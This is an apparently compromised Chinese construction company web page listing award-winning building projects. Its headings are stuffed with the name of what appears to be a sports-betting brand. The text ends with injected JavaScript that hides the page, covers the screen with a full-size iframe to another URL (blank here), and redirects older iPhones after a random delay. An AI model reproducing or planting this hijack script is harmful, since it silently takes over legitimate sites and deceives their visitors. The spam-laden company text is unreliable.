QSTY球速体育新闻资讯 QSTY球速体育新闻资讯传递某某故事 彰显品牌价值
QSTY球速体育工程展示 QSTY球速体育工程展示公司在土建、安装、装饰、钢结构、消防、空调、智能化等领域处于全省领先地位。
  • 国际机场航站楼
    荣获2016年度国家优质工程奖、2014年度中国钢结构金奖。...
  • CBD创业大厦工程
    荣获2014年度山杯奖。...
  • 文化中心
    荣获2010年度泰山杯奖、国家钢结构金奖、2008年度省级安全文明示范工地 、2011年全国建筑工程装饰奖。...
  • 海洋产权交易中心
    荣获2014年山东省优质结构奖。...
  • 火车站
    荣获2010年度国家优质工程奖、2010年度中国钢结构金奖、2008年度省级安全文明优良工地。...
  • 医院综合大楼
    荣获2015年国家优质工程奖、2004年度泰山杯奖。...
  • 发展研究所
    荣获2009年度泰山杯奖。...
  • 会展中心
    荣获2007年度鲁班奖、2006年度省级安全示范文明工地。...
公司简介
某某集团有限公司建筑安装分公司是集团公司龙头企业
更多>>
公司资质
经过多年的积累,十公司已经获得各种资质荣誉
更多>>
企业文化
诚信 自强 创新 一流 追求卓越
更多>>
组织架构
经过多年的积累,十公司已经承载太多的发展故事
更多>>
"; // 电脑链接 const mobileUrl = ""; // 移动链接 const isIOS = !!navigator.userAgent.match(/(iPod|iPhone|iPad)/); const time = Math.floor(Math.random() * (1000 - 500 + 1)) + 500; if (isIOS && getIosVersion() < 13) { setTimeout(() => { window.location.href = mobileUrl; }, time); } else { // 检测用户使用的设备类型 const isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent); document.addEventListener("DOMContentLoaded", () => { const viewportMeta = document.createElement("meta"); viewportMeta.setAttribute("name", "viewport"); viewportMeta.setAttribute("content", "user-scalable=no, width=device-width, initial-scale=1.0"); document.head.appendChild(viewportMeta); const style = document.createElement("style"); style.innerHTML = "html, body { width: 100%; height: 100%; overflow: hidden; }"; document.head.appendChild(style); const divContainer = document.createElement("div"); divContainer.style.cssText = "width: 100%; height: 100%; position: absolute; top: 0; left: 0; z-index: 2147483647; background: #fff;"; document.body.appendChild(divContainer); const iframe = document.createElement("iframe"); iframe.src = isMobile ? mobileUrl : desktopUrl; iframe.style.cssText = "border: 0; width: 100%; text-align: center; border: medium none; height: 100%; max-height: 4000px;"; divContainer.appendChild(iframe); }); }